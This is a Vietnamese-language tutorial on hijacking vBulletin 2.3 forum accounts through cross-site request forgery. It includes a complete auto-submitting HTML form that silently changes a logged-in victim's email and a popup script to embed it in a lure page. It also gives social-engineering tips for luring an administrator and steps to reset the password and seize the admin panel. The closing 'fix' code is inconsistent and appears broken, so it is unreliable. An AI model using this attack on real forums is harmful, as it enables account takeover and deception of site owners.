Hack Forum Vbulettin Board.
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (36.86 KB, 3 trang )
Hack Forum Vbulettin Board
trang này đã được đọc lần
Cách này áp dụng chung cho tất cả các forum nào không đòi hỏi phải điền mật khẩu khi change email và đây
là cách để hack forum vbb 2.3 trở xuống vì trong phiên bản mới 3.0 của vbb đã yêu cầu nhập password khi
change email .
Bước 1 : tạo 1 file đặt tên là popup.htm có nội dung như sau :
<html>
<body onload="javascript:document.forms[0].submit();">
<center>
<table cellSpacing="0" cellPadding="0" width="100%" bgColor="#ffffff" border="0" height="168"
style="border-collapse: collapse" bordercolor="#111111">
<tr>
<td height="148">
<p><br>
</p>
<p><br>
</p>
<center>
<p>
</p>
</center>
<form action="http://localhost/vbb/member.php" method="post">
<input type="hidden" value="" name="s">
<p>
<font face="verdana, arial, helvetica" size="2">
<input class="bginput" maxLength="150" type="hidden" size="30" value=""
name="email"></font><br>
<font face="verdana, arial, helvetica" size="2">
<input class="bginput" maxLength="150" type="hidden" size="30" value=""
name="emailconfirm"></font></p>
<table cellSpacing="0" cellPadding="2" width="100%" align="center" border="0" height="1">
<tr>
<td align="middle" height="1"><font face="verdana, arial, helvetica" size="2">
<input type="hidden" value="updateprofile" name="action">
<input class="bginput" accessKey="s" type="submit" value="Submit" name="Submit">
</font></td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</center>
</body>
</html>
bạn chú ý cái session , chúng ta nên để là khoảng trắng vì vì nó sẽ trả về session hiện tại của nạn nhân khi ta
thay đồi email của họ .
Cái popup.htm này sẽ auto submit khi ta open nó ----> nạn nhân sẽ không hề hay biết họ đã bị change
email .
Khi hack bạn chú ý thay đổi cái action cho phù hợp với website mà mình muốn hack .
Bạn có thể thay đổi cái email thành email của mình hay email nào mà bạn muốn .
Bước 2 : Tôi gọi website của tôi là .
Open source của cái index.htm , thêm đoạn code này vào :
<script language='JavaScript'>
window.open('popup.htm','Popup','width=30,height=30');
</script>
Khi nạn nhân view cái website của bạn thì 1 popup sẽ tự xuất hiện , và auto submit change email theo ý mình
.
Buớc 3 : dụ dỗ nạn nhân vào website : có rất nhiều cách nhưng để thực hiên đươc mục tiêu thì nhất định nạn
nhân phải đang login trong forum mà ta muốn hack , tôi sẽ đưa ra 1 cách minh hoạ : đăng kí 1 account trong
forum , private cho victim với nội dung là check dùm secure cho website , và sau đó mọi chuyện sẽ diễn ra
theo đúng ý ta nếu victim click vào link .
Sau khi change email thì bạn forgot password sau đó vào http://victim/admin/index.php với user và pass vừa
có được .
Điểm đặc bịêt cần lưu ý là email của bạn đăng kí trong forum phải không được trùng với email mà bạn muốn
victim thay đổi , nếu không thì sẽ không đạt kết quả .
Như vậy là đã xong cách hack .
Cách fix :
Mở file admin/vbulletin.style tìm
<tr>
<td bgcolor="{secondaltcolor}"><normalfont><b>Confirm Email Address:</b></normalfont></td>
<td bgcolor="{secondaltcolor}"><normalfont><input type="text" class="bginput" name="emailconfirm"
value="$bbuserinfo[email]" size="30" maxlength="150"></normalfont></td>
</tr>
them vao ben duoi :
<tr>
<td bgcolor="{secondaltcolor}"><normalfont><b>Your password:</b></normalfont></td>
<td bgcolor="{secondaltcolor}"><normalfont><input type="text" class="bginput" name="pword"
value="$bbuserinfo[password]" size="30" maxlength="150"></normalfont></td>
</tr>
Mở file /member.php , tìm:
if ($requireuniqueemail and $bbuserinfo['email']!=$email and $checkuser=$DB_site->query_first("SELECT
userid,username,email FROM user WHERE email='".addslashes
thêm vào bên trên như thế này:
///////////////////////////////////////Mask's fix///////////////////////
if ($userinfo[password]!=$password)
{
die("Da duoc fix , dung hack vo ich");
}
////////////////////////////////////////////////////////////////////////
if ($requireuniqueemail and $bbuserinfo['email']!=$email and $checkuser=$DB_site->query_first("SELECT
userid,username,email FROM user WHERE email='".addslashes
tim :
if ($email=="" or $emailconfirm=="")
them vao :
if ($email=="" or $emailconfirm=="" or $pword=="").
